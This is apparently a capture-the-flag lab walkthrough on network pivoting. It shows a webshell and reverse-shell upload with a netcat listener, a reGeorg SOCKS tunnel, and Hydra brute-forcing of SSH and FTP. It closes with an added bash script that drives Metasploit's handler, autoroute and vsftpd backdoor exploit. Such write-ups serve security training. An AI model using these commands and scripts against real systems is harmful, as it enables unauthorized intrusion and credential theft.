Pivoting IX

Steps Taken:

1. Scanning the first target machine:

2. Enumerating directories on the webpage with DirBuster:

	- Note that the link to the login form is given to us in the first place: http://{ip}/?/admin
	- Checking where the uploaded files land:

3. Upload a simple webshell:

4. Using the webshell to interact with the web server:

5. Taking advantage of the webshell to acquire a reverse shell, so we upload php-reverse-shell.php:

6. Using the uploaded reverse shell:

	- First, create a netcat listener with:

```bash
nc -lvnp 8080
```

	- Second, execute it by going to: http://192.73.87.3/public/php-reverse-shell.php
	- Note that this php file is modified so that it connects back to the port 8080 listener on the attacker machine.

	- You'd notice that the webpage keeps loading: that means the file got executed and is still running as a process, holding the connection to our listener open.

Netcat perspective:

7. Find the flag in this compromised machine:

```bash
find / -name '*flag*' 2>/dev/null
```

8. Get the flag:

```bash
cat /tmp/flag1.txt
```

9. Make this compromised machine a pivot to the internal network to reach internal network machines through the use of reGeorg:

	- Go to: ~/Desktop/tools/reGeorg/php/

10. In this directory you can see the "tunnel.php" file. Upload it on the webpage. It is used to tunnel from the webserver into the internal network the webserver is connected to!

11. Now that the php file is uploaded, use the Python script to start a SOCKS proxy on the attacker machine so it can reach the internal network machines:

```bash
python reGeorgSocksProxy.py -p 9050 -u http://{ip}/public/tunnel.php
```

12. Now, nmap the internal machine through proxychains:

```bash
proxychains nmap -sT -Pn {target-ip-internal}
```

	- -sT (TCP connect scan) and -Pn (skip host discovery) are required here: proxychains only relays TCP connections made through the SOCKS proxy, so raw SYN scans and ICMP pings would never traverse the tunnel.
	- This shows that there are 2 ports open: port 22 (SSH) and port 21 (FTP).
	- Both services can be brute-forced with Hydra, so we run those in parallel.

13. Bruteforcing SSH and FTP

```bash
proxychains hydra 192.121.141.3 ssh -t 4 -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt -f -V
```

```bash
proxychains hydra 192.121.141.3 ftp -t 4 -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt -f -V
```

	- Note that you can run both in separate terminals to do them in parallel!

14. While doing so, you can also look for exploits for these services in Metasploit. The thing is, we connected to the web server via a webshell and then upgraded to a bash reverse shell. Is there a way to do that in Metasploit?

	- Now, we use exploit/multi/handler, which basically does what the "nc -lvnp 8080" command did: it just listens for the connection coming from the compromised webserver.

	- Of course, I initialize the postgresql database first:

```bash
# service postgresql start
# msfdb init
# msfconsole -q
msf > db_status
```

	- Note that it connected AFTER executing php-reverse-shell.php AGAIN at /public/php-reverse-shell.php on the webserver!

15. Reflection:

	- It seems that brute-forcing the FTP and SSH services is taking too long; let's try to find an exploit in Metasploit for FTP.

16. Using FTP exploit from metasploit:

```
msf > search vsftpd
```

	- Notice that I upgraded the acquired reverse shell as well!

	- Here's the interface for the internal network that the web server is connected to.

17. Creating another pivot on the compromised machine with autoroute, so the exploit can be sent to the internal network machine:

18. Check again if the SOCKS proxy server is there:

	- It is there on port 9050, run by python, which is reGeorgSocksProxy.py!
	- At this point I don't think the SOCKS proxy is necessary any more: another pivot was created with Metasploit's autoroute, so modules run from inside msfconsole reach the internal network without proxychains.

19. Trying the FTP exploit:

20. Exploiting the internal machine with the FTP exploit:
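
The Metasploit side of steps 14 to 20, added here as an example and not code from the original post: two resource scripts, one for the multi/handler listener that replaces "nc -lvnp 8080", and one to run once the shell has been upgraded, which adds the autoroute pivot (so proxychains and the reGeorg proxy are no longer needed for modules inside msfconsole), optionally starts the framework's own SOCKS server for outside tools, and fires the FTP exploit through the route. From the post: listener port 8080, the upgrade via `sessions -u`, the `search vsftpd`. Assumptions of this example: the generic/shell_reverse_tcp payload for the PentestMonkey-style shell, the subnet and session values, and exploit/unix/ftp/vsftpd_234_backdoor as the module the search turned up (the post never names the module it ran).

```bash
#!/usr/bin/env bash
# Added example (not from the original post): msfconsole resource scripts for
# the handler -> upgrade -> autoroute -> exploit sequence. Assumed: the payload
# name, the session/subnet values, and the vsftpd module name.
set -u

# Stage 1: catch the reverse shell. Same job as "nc -lvnp 8080"; -j backgrounds
# the handler and ExitOnSession=false keeps it alive for re-triggers of the URL.
handler_rc() {
  local lhost="$1" lport="${2:-8080}"
  cat <<EOF
use exploit/multi/handler
set payload generic/shell_reverse_tcp
set LHOST ${lhost}
set LPORT ${lport}
set ExitOnSession false
exploit -j
EOF
}

# Stage 2: run after "sessions -u <shell session>" has produced a meterpreter
# session (assumed id passed as \$1). autoroute adds a route for the internal
# subnet through that session, so every module run inside msfconsole reaches the
# internal host directly; socks_proxy is only for tools outside the framework.
pivot_rc() {
  local session="$1" subnet="$2" netmask="${3:-255.255.255.0}" rhost="$4"
  case "$session" in
    ''|*[!0-9]*) echo "session id must be numeric, got '$session'" >&2; return 1 ;;
  esac
  cat <<EOF
use post/multi/manage/autoroute
set SESSION ${session}
set CMD add
set SUBNET ${subnet}
set NETMASK ${netmask}
run
route print
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
set VERSION 5
run -j
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS ${rhost}
run
EOF
}

# Feed a generated script to msfconsole via -r. Only reached when msfconsole is
# installed, so the definitions above load cleanly on any box.
run_rc() {
  local rc
  rc="$(mktemp)"
  cat >"$rc"
  msfconsole -q -r "$rc"
}

# Usage (assumed variable names):
#   MSF_LHOST=10.8.0.2 bash msf_pivot.sh                                   # stage 1
#   MSF_SESSION=2 MSF_SUBNET=192.121.141.0 MSF_RHOST=192.121.141.3 bash msf_pivot.sh  # stage 2
if command -v msfconsole >/dev/null 2>&1; then
  if [ -n "${MSF_SESSION:-}" ]; then
    pivot_rc "$MSF_SESSION" "${MSF_SUBNET:?}" 255.255.255.0 "${MSF_RHOST:?}" | run_rc
  elif [ -n "${MSF_LHOST:-}" ]; then
    handler_rc "$MSF_LHOST" 8080 | run_rc
  fi
fi
```

The two stages are split on purpose: a resource script runs top to bottom, and the session id that autoroute needs only exists after the webserver has called back and the shell has been upgraded, so stage 2 cannot be queued behind stage 1 in a single file.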

21. Finding the flag and taking it:

```bash
find / -name '*flag*' 2>/dev/null
```

```bash
cat /usr/bin/flag1.txt
```

This post is licensed under CC BY 4.0 by the author.